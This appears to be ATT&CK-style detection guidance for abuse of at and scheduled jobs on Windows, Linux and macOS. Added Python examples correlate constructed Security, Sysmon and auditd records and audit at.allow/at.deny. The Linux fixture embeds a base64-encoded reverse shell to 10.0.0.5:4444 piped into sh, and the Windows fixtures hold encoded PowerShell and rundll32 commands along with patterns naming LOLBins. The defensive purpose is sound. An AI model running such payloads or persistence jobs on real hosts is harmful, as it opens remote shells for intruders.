Detects creation of scheduled tasks via at.exe or the WMI Win32_ScheduledJob class, followed by execution of anomalous processes by svchost.exe or taskeng.exe. at.exe has been deprecated since Windows 8 in favour of schtasks.exe, so any at.exe invocation on a current host is itself worth reviewing. Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, so confirm the audit policy before relying on this analytic.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | WinEventLog:Security | EventCode=4698 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Field | Description |
|---|---|
| TaskUser | Unusual users creating jobs (e.g., non-admin accounts or service users). |
| ExecutionTimeWindow | Delay between task registration and execution. |
| CommandLinePattern | Unexpected script or binary execution (e.g., cmd.exe /c PowerShell payload). |
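As an added example that is not part of this page or of the ATT&CK project, the following Python correlates constructed Security 4698 records with constructed Sysmon EventCode 1 records the way the analytic above describes: a task created by a user outside a trusted baseline, and/or a process spawned by svchost.exe or taskeng.exe within the execution window whose command line matches a suspicious pattern. Field names follow the Security and Sysmon event schemas; the trusted-user set, the 300-second window and the regex list are assumptions standing in for the TaskUser, ExecutionTimeWindow and CommandLinePattern elements.

```python
"""Correlate Security 4698 (scheduled task created) with Sysmon EventCode 1
(process creation) to surface at.exe/WMI-style jobs whose payload runs from
the Task Scheduler host processes."""
from datetime import datetime
import re

# Mutable elements of the analytic; values are assumptions, tune to the environment.
TRUSTED_TASK_USERS = {"svc_backup", "Administrator"}    # TaskUser baseline
EXECUTION_WINDOW_SECONDS = 300                            # ExecutionTimeWindow
SCHEDULER_PARENTS = ("\\svchost.exe", "\\taskeng.exe")    # lower-case image suffixes
SUSPICIOUS_CMDLINE = [                                    # CommandLinePattern
    re.compile(r"cmd\.exe\s+/c\s+.*powershell", re.I),
    re.compile(r"powershell.*\s-(enc|encodedcommand)\s", re.I),
    re.compile(r"\b(mshta|rundll32|regsvr32|certutil)\.exe\b", re.I),
]

# Constructed sample telemetry (not captured from a real host).
SECURITY_4698 = [
    {"EventCode": 4698, "TimeCreated": "2024-05-01T10:00:00", "SubjectUserName": "jdoe",
     "TaskName": "\\At1", "TaskContent": "<Command>cmd.exe</Command><Arguments>/c powershell -enc SQBFAFgA</Arguments>"},
    {"EventCode": 4698, "TimeCreated": "2024-05-01T10:25:00", "SubjectUserName": "svc_backup",
     "TaskName": "\\NightlyBackup", "TaskContent": "<Command>C:\\Tools\\backup.exe</Command>"},
    {"EventCode": 4698, "TimeCreated": "2024-05-01T11:00:00", "SubjectUserName": "Administrator",
     "TaskName": "\\At2", "TaskContent": "<Command>rundll32.exe</Command>"},
]
SYSMON_1 = [
    {"EventCode": 1, "UtcTime": "2024-05-01T10:01:05", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -enc SQBFAFgA"},
    {"EventCode": 1, "UtcTime": "2024-05-01T10:00:30", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell Get-Date"},
    {"EventCode": 1, "UtcTime": "2024-05-01T10:30:00", "ParentImage": "C:\\Windows\\System32\\taskeng.exe",
     "Image": "C:\\Tools\\backup.exe", "CommandLine": "backup.exe --full"},
    {"EventCode": 1, "UtcTime": "2024-05-01T11:00:10", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe C:\\Users\\Public\\x.dll,Start"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def correlate(task_events, proc_events, window=EXECUTION_WINDOW_SECONDS,
              trusted_users=TRUSTED_TASK_USERS):
    """Return one alert per scheduler-spawned process that follows a task
    creation within `window` seconds and shows an untrusted creator and/or a
    suspicious command line. Both signals together raise the severity."""
    alerts = []
    for task in task_events:
        if task.get("EventCode") != 4698:
            continue
        created = _ts(task["TimeCreated"])
        untrusted = task["SubjectUserName"] not in trusted_users
        for proc in proc_events:
            if proc.get("EventCode") != 1:
                continue
            # Only children of the Task Scheduler host processes are of interest here.
            if not proc["ParentImage"].lower().endswith(SCHEDULER_PARENTS):
                continue
            delay = (_ts(proc["UtcTime"]) - created).total_seconds()
            if not 0 <= delay <= window:
                continue
            pattern_hit = any(p.search(proc["CommandLine"]) for p in SUSPICIOUS_CMDLINE)
            if not (untrusted or pattern_hit):
                continue
            alerts.append({
                "task_name": task["TaskName"],
                "task_user": task["SubjectUserName"],
                "delay_seconds": delay,
                "parent": proc["ParentImage"],
                "command_line": proc["CommandLine"],
                "severity": "high" if untrusted and pattern_hit else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SECURITY_4698, SYSMON_1):
        print(alert)
```

In the constructed data the jdoe task fires at high severity (untrusted creator plus an encoded PowerShell payload 65 seconds later), the backup task creates no alert even though its binary runs under taskeng.exe inside the window, and the Administrator task fires at medium severity on the command-line pattern alone. Narrowing the window below the observed delays suppresses everything, which is the knob to turn when at-style jobs in the environment are legitimately scheduled far in advance.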
Detects usage of the at command to schedule jobs, followed by job execution and modification of job files under /var/spool/cron/atjobs. The spool location is distribution-specific (/var/spool/cron/atjobs on Debian-based systems, /var/spool/at on RHEL-based systems), so the file watch must cover the path actually used on the host.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| File Modification (DC0061) | auditd:SYSCALL | write |
| Field | Description |
|---|---|
| AtJobPath | Monitoring additional paths (e.g., tmp-mounted spool dirs) for modified at jobs. |
| ScheduleLatency | Expected delay between at job creation and execution. |
| JobScriptEntropy | High entropy or obfuscation in at job payloads. |
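The following Python is an added example and not part of this page or of the ATT&CK project. It parses constructed auditd records (assumed rules: an execve rule keyed `at_exec` and a `-w` watch on the spool directory keyed `at_spool`), reconstructs the chain the analytic describes (at invoked, job file created in the spool, atd opening the job when it is due, which gives the ScheduleLatency), and applies a Shannon-entropy score to the command executed immediately afterwards as one concrete form of the JobScriptEntropy element. The spool path list, the 4.5 bits/char threshold and the 5-second attribution window are assumptions.

```python
"""Reconstruct at(1) job scheduling, spool-file creation and execution from
auditd records, measure the schedule latency, and score the executed command
line for obfuscation."""
import math
import re
from collections import defaultdict

# Mutable elements of the analytic (assumed values).
AT_JOB_PATHS = ("/var/spool/cron/atjobs/", "/var/spool/at/")  # AtJobPath; add tmp-mounted spool dirs
EXEC_FOLLOW_SECONDS = 5.0   # execve records this soon after atd opens a job are attributed to it
ENTROPY_THRESHOLD = 4.5     # JobScriptEntropy in bits/char; base64 or hex blobs land well above this
EXECVE, OPENAT = "59", "257"  # x86_64 syscall numbers (arch=c000003e)

HEADER_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
HEX_RE = re.compile(r"^(?:[0-9A-F]{2})+$")
HEX_FIELDS = re.compile(r"^(a\d+|comm|exe|name|cwd|proctitle)$")


def decode_value(key, raw):
    # auditd quotes plain strings and hex-encodes string fields containing spaces or quotes.
    if raw.startswith('"'):
        return raw.strip('"')
    if HEX_FIELDS.match(key) and HEX_RE.match(raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_audit_line(line):
    m = HEADER_RE.match(line.strip())
    if not m:
        return None
    rtype, ts, serial, rest = m.groups()
    rec = {"type": rtype, "ts": float(ts), "serial": int(serial)}
    rec.update((k, decode_value(k, v)) for k, v in KV_RE.findall(rest))
    return rec


def shannon_entropy(text):
    """Bits of entropy per character of `text`."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def argv_of(execve_rec):
    return [execve_rec.get(f"a{i}", "") for i in range(int(execve_rec.get("argc", 0)))]


def analyze(lines):
    by_serial = defaultdict(list)   # records sharing a serial belong to one syscall event
    for line in lines:
        rec = parse_audit_line(line)
        if rec:
            by_serial[rec["serial"]].append(rec)
    scheduled, created, executed, suspicious = [], {}, [], []
    for serial in sorted(by_serial):
        recs = by_serial[serial]
        sc = next((r for r in recs if r["type"] == "SYSCALL"), None)
        if sc is None:
            continue
        ex = next((r for r in recs if r["type"] == "EXECVE"), None)
        spool = [r for r in recs if r["type"] == "PATH" and r.get("name", "").startswith(AT_JOB_PATHS)]
        if sc["syscall"] == EXECVE and sc.get("exe") == "/usr/bin/at":
            scheduled.append({"ts": sc["ts"], "uid": sc["uid"], "argv": argv_of(ex) if ex else []})
        elif sc["syscall"] == OPENAT and spool and sc.get("comm") == "at":
            # The -w watch fires on the open that creates the job file; write(2) carries no PATH record.
            created[spool[0]["name"]] = {"ts": sc["ts"], "uid": sc["uid"]}
        elif sc["syscall"] == OPENAT and spool and sc.get("comm") == "atd":
            c = created.get(spool[0]["name"])
            executed.append({"ts": sc["ts"], "path": spool[0]["name"], "uid": c["uid"] if c else None,
                             "latency_seconds": sc["ts"] - c["ts"] if c else None})
        elif sc["syscall"] == EXECVE and ex is not None:
            cmd = " ".join(argv_of(ex))
            if any(0 <= sc["ts"] - e["ts"] <= EXEC_FOLLOW_SECONDS for e in executed):
                h = shannon_entropy(cmd)
                if h > ENTROPY_THRESHOLD:
                    suspicious.append({"ts": sc["ts"], "uid": sc["uid"], "cmd": cmd, "entropy": round(h, 2)})
    return {"scheduled": scheduled, "jobs": executed, "suspicious": suspicious}


SUSPICIOUS_CMD = "echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuNS80NDQ0IDA+JjE= | base64 -d | sh"
BENIGN_CMD = "/usr/local/bin/backup.sh"
# Constructed records (not from a real host). Record 916's a2 is hex-encoded because it contains spaces.
SAMPLE_LOG = f"""
type=SYSCALL msg=audit(1714560000.101:901): arch=c000003e syscall=59 success=yes exit=0 ppid=4120 pid=4131 auid=1001 uid=1001 gid=1001 euid=1001 comm="at" exe="/usr/bin/at" key="at_exec"
type=EXECVE msg=audit(1714560000.101:901): argc=3 a0="at" a1="now" a2="+1min"
type=SYSCALL msg=audit(1714560000.105:902): arch=c000003e syscall=257 success=yes exit=3 ppid=4120 pid=4131 auid=1001 uid=1001 gid=1001 euid=0 comm="at" exe="/usr/bin/at" key="at_spool"
type=PATH msg=audit(1714560000.105:902): item=1 name="/var/spool/cron/atjobs/a0000f019f3c2a" inode=131 mode=0100700 ouid=1001 ogid=1001 nametype=CREATE
type=SYSCALL msg=audit(1714560060.002:915): arch=c000003e syscall=257 success=yes exit=4 ppid=1 pid=812 auid=4294967295 uid=0 gid=0 euid=0 comm="atd" exe="/usr/sbin/atd" key="at_spool"
type=PATH msg=audit(1714560060.002:915): item=0 name="/var/spool/cron/atjobs/a0000f019f3c2a" inode=131 mode=0100700 ouid=1001 ogid=1001 nametype=NORMAL
type=SYSCALL msg=audit(1714560060.010:916): arch=c000003e syscall=59 success=yes exit=0 ppid=4201 pid=4202 auid=4294967295 uid=1001 gid=1001 euid=1001 comm="sh" exe="/usr/bin/dash" key="at_exec"
type=EXECVE msg=audit(1714560060.010:916): argc=3 a0="sh" a1="-c" a2={SUSPICIOUS_CMD.encode().hex().upper()}
type=SYSCALL msg=audit(1714560100.000:930): arch=c000003e syscall=257 success=yes exit=3 ppid=4300 pid=4301 auid=1002 uid=1002 gid=1002 euid=0 comm="at" exe="/usr/bin/at" key="at_spool"
type=PATH msg=audit(1714560100.000:930): item=1 name="/var/spool/cron/atjobs/a0000f119f4a10" inode=132 mode=0100700 ouid=1002 ogid=1002 nametype=CREATE
type=SYSCALL msg=audit(1714560120.200:938): arch=c000003e syscall=257 success=yes exit=4 ppid=1 pid=812 auid=4294967295 uid=0 gid=0 euid=0 comm="atd" exe="/usr/sbin/atd" key="at_spool"
type=PATH msg=audit(1714560120.200:938): item=0 name="/var/spool/cron/atjobs/a0000f119f4a10" inode=132 mode=0100700 ouid=1002 ogid=1002 nametype=NORMAL
type=SYSCALL msg=audit(1714560120.300:940): arch=c000003e syscall=59 success=yes exit=0 ppid=4310 pid=4311 auid=4294967295 uid=1002 gid=1002 euid=1002 comm="backup.sh" exe="/usr/local/bin/backup.sh" key="at_exec"
type=EXECVE msg=audit(1714560120.300:940): argc=1 a0="{BENIGN_CMD}"
"""
```

Two caveats the sample is built to show. First, a `-w ... -p wa` watch reports the openat that creates or later reads the job file, not the write(2) call itself, which is why job creation and execution are both matched on syscall 257 and told apart by the process (at versus atd) and the PATH nametype. Second, auditd hex-encodes argv entries that contain whitespace, so a parser that does not decode them never sees the `base64 -d | sh` pipeline; the piped-decoder command scores above 5 bits/char while the plain backup script scores under 4, so the threshold separates them comfortably.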
Detects user or root invocation of the at command to schedule a job, followed by job execution by atrun (started from launchd) and activity in /usr/lib/cron/at. atrun is disabled by default on macOS, so an enabled com.apple.atrun launchd job is itself a configuration change worth alerting on.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | macos:unifiedlog | process: at, atrun (job runner) |
| File Modification (DC0061) | fs:fsusage | file access to /usr/lib/cron/at and job execution path |
| Process Creation (DC0032) | macos:osquery | process_events |
| Field | Description |
|---|---|
| AtPermissions | Whether `at.allow` and `at.deny` are properly configured. |
| ExecutionCommand | Target binary executed via the at job. |
| RunUser | Detection of root user scheduling job with unusual command. |
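The AtPermissions element asks whether at.allow and at.deny are configured properly; the following Python is an added example (not part of this page or of the ATT&CK project) that evaluates those files with the precedence at(1) itself applies and classifies the resulting posture. The rules are: root may always use at; if at.allow exists only the users listed in it may; otherwise any user not listed in at.deny may (an empty at.deny therefore opens at to everyone); if neither file exists, only root may. The example works on constructed fixture directories, so the directory argument stands in for the real location (assumed to be /usr/lib/cron on macOS, alongside the spool this analytic names, and /etc on Linux).

```python
"""Evaluate at.allow/at.deny the way at(1) does and summarise the resulting
access posture, so a collector can report who may schedule jobs on a host."""
import os
import tempfile


def read_users(path):
    """Usernames listed one per line, or None when the file does not exist."""
    if not os.path.exists(path):
        return None
    with open(path) as fh:
        return {line.strip() for line in fh if line.strip()}


def at_permitted(user, perm_dir, superuser="root"):
    """at(1) rules: root always; at.allow wins if present; otherwise at.deny;
    with neither file present only root may use at."""
    if user == superuser:
        return True, "superuser"
    allow = read_users(os.path.join(perm_dir, "at.allow"))
    if allow is not None:
        return user in allow, "at.allow"
    deny = read_users(os.path.join(perm_dir, "at.deny"))
    if deny is not None:
        return user not in deny, "at.deny"
    return False, "no at.allow or at.deny"


def assess_posture(perm_dir):
    """Classify the configuration; 'open' is the weak setting worth alerting on."""
    allow = read_users(os.path.join(perm_dir, "at.allow"))
    deny = read_users(os.path.join(perm_dir, "at.deny"))
    if allow is not None:
        return "allowlist", f"only root and {sorted(allow)} may use at"
    if deny is not None and not deny:
        return "open", "at.deny exists and is empty, so every local user may schedule jobs"
    if deny is not None:
        return "denylist", f"everyone except {sorted(deny)} may use at"
    return "root-only", "neither file present; only root may use at"


def build_fixture(files):
    """Write constructed at.allow/at.deny contents into a fresh temp dir and return it."""
    perm_dir = tempfile.mkdtemp(prefix="at-perms-")
    for name, body in files.items():
        with open(os.path.join(perm_dir, name), "w") as fh:
            fh.write(body)
    return perm_dir


if __name__ == "__main__":
    # Constructed configurations: the default baseline, the weak setting, and an allowlist.
    fixtures = {"baseline": {}, "weak": {"at.deny": ""},
                "allowlist": {"at.allow": "backup\n", "at.deny": "alice\n"}}
    for label, files in fixtures.items():
        d = build_fixture(files)
        who = {u: at_permitted(u, d)[0] for u in ("root", "backup", "alice", "bob")}
        print(label, assess_posture(d), who)
```

The allowlist fixture also shows the precedence trap: a user listed in at.deny but absent from at.allow is refused because at.deny is never consulted once at.allow exists, so auditing only at.deny on a host that also has at.allow gives a misleading picture. On macOS, pair this check with whether the com.apple.atrun launchd job is loaded at all, since without atrun no queued job ever runs.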